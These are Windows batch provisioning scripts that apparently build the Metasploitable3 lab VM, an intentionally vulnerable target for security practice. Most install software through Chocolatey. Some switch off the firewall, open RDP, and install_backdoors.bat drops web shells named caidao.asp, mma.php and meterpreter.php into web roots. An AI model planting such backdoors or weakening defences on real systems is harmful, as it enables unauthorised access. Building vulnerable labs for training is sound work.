https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/wordpress/wordpress.zip -------------------------------------------------------------------------------- /scripts/chocolatey_installs/7zip.bat: -------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco 
install 7zip 3 | chocolatey feature disable -n=allowGlobalConfirmation 4 | exit -------------------------------------------------------------------------------- /scripts/chocolatey_installs/boxstarter.bat: -------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco install BoxStarter 3 | chocolatey feature disable -n=allowGlobalConfirmation -------------------------------------------------------------------------------- /scripts/chocolatey_installs/chocolatey-compatibility.bat: -------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco install chocolatey-compatibility.extension 3 | chocolatey feature disable -n=allowGlobalConfirmation 4 | exit 5 | -------------------------------------------------------------------------------- /scripts/chocolatey_installs/java.bat: -------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco install jre8 --version 8.0.251 3 | chocolatey feature disable -n=allowGlobalConfirmation 4 | exit 5 | -------------------------------------------------------------------------------- /scripts/chocolatey_installs/ruby.bat: -------------------------------------------------------------------------------- 1 | choco install -y ruby --version 2.3.3 2 | refreshenv 3 | -------------------------------------------------------------------------------- /scripts/chocolatey_installs/tomcat.bat: -------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco install tomcat --version 8.0.33 3 | chocolatey feature disable -n=allowGlobalConfirmation 4 | exit 5 | -------------------------------------------------------------------------------- /scripts/chocolatey_installs/vcredist2008.bat: 
-------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco install vcredist2008 3 | chocolatey feature disable -n=allowGlobalConfirmation 4 | exit -------------------------------------------------------------------------------- /scripts/configs/apply_password_settings.bat: -------------------------------------------------------------------------------- 1 | secedit.exe /configure /db %windir%\securitynew.sdb /cfg C:\vagrant\resources\security_settings\secconfig.cfg /areas SECURITYPOLICY -------------------------------------------------------------------------------- /scripts/configs/disable-auto-logon.bat: -------------------------------------------------------------------------------- 1 | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /d 0 /f -------------------------------------------------------------------------------- /scripts/configs/disable_firewall.bat: -------------------------------------------------------------------------------- 1 | netsh advfirewall set allprofiles state off 2 | -------------------------------------------------------------------------------- /scripts/configs/enable-rdp.bat: -------------------------------------------------------------------------------- 1 | netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389 2 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 3 | -------------------------------------------------------------------------------- /scripts/configs/enable_firewall.bat: -------------------------------------------------------------------------------- 1 | netsh advfirewall set allprofiles state on -------------------------------------------------------------------------------- /scripts/configs/microsoft-updates.bat: 
--------------------------------------------------------------------------------
1 | net stop wuauserv
2 | REM The Windows Update service is stopped while its settings are changed and restarted on the last line.
3 | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v EnableFeaturedSoftware /t REG_DWORD /d 1 /f
4 |
5 | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v IncludeRecommendedUpdates /t REG_DWORD /d 1 /f
6 | REM Writes a two-line VBScript to A:\temp.vbs that calls AddService2 on Microsoft.Update.ServiceManager, presumably to register the Microsoft Update service.
7 | echo Set ServiceManager = CreateObject("Microsoft.Update.ServiceManager") > A:\temp.vbs
8 | echo Set NewUpdateService = ServiceManager.AddService2("7971f918-a847-4430-9279-4a52d1efe18d",7,"") >> A:\temp.vbs
9 | REM NOTE(review): temp.vbs is executed from A:\ and is not deleted afterwards.
10 | cscript A:\temp.vbs
11 |
12 | net start wuauserv
--------------------------------------------------------------------------------
/scripts/configs/packer_cleanup.bat:
--------------------------------------------------------------------------------
1 | rmdir /S /Q C:\vagrant
--------------------------------------------------------------------------------
/scripts/configs/update_root_certs.bat:
--------------------------------------------------------------------------------
1 | cmd /c certutil -addstore -f "Root" A:\addtrust_external_ca.cer
2 | cmd /c certutil -addstore -f "Root" A:\baltimore_ca.cer
3 | cmd /c certutil -addstore -f "Root" A:\digicert.cer
4 | cmd /c certutil -addstore -f "Root" A:\equifax.cer
5 | cmd /c certutil -addstore -f "Root" A:\globalsign.cer
6 | cmd /c certutil -addstore -f "Root" A:\gte_cybertrust.cer
7 | cmd /c certutil -addstore -f "Root" A:\microsoft_root_2011.cer
8 | cmd /c certutil -addstore -f "Root" A:\thawte_primary_root.cer
9 | cmd /c certutil -addstore -f "Root" A:\utn-userfirst.cer
--------------------------------------------------------------------------------
/scripts/installs/install_backdoors.bat:
--------------------------------------------------------------------------------
1 | copy C:\vagrant\resources\backdoors\caidao.asp "C:\inetpub\wwwroot"
2 | copy C:\vagrant\resources\backdoors\mma.php "C:\wamp\www"
3 | copy C:\vagrant\resources\backdoors\meterpreter.php "C:\wamp\www"
4 | REM Copies three files from resources\backdoors into the IIS and WAMP web roots as lab targets. On any other host, these file names in a web root should be treated as an indicator of compromise.
--------------------------------------------------------------------------------
/scripts/installs/install_devkit.bat:
--------------------------------------------------------------------------------
1 | mkdir "C:\RubyDevKit"
2 | powershell -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://github.com/rapid7/metasploit-omnibus-cache/raw/7cad45e5886d0a9b3d587c86a65d66234986223a/DevKit-mingw64-64-4.7.2-20130224-1432-sfx.exe', 'C:\RubyDevKit\devkit.exe')"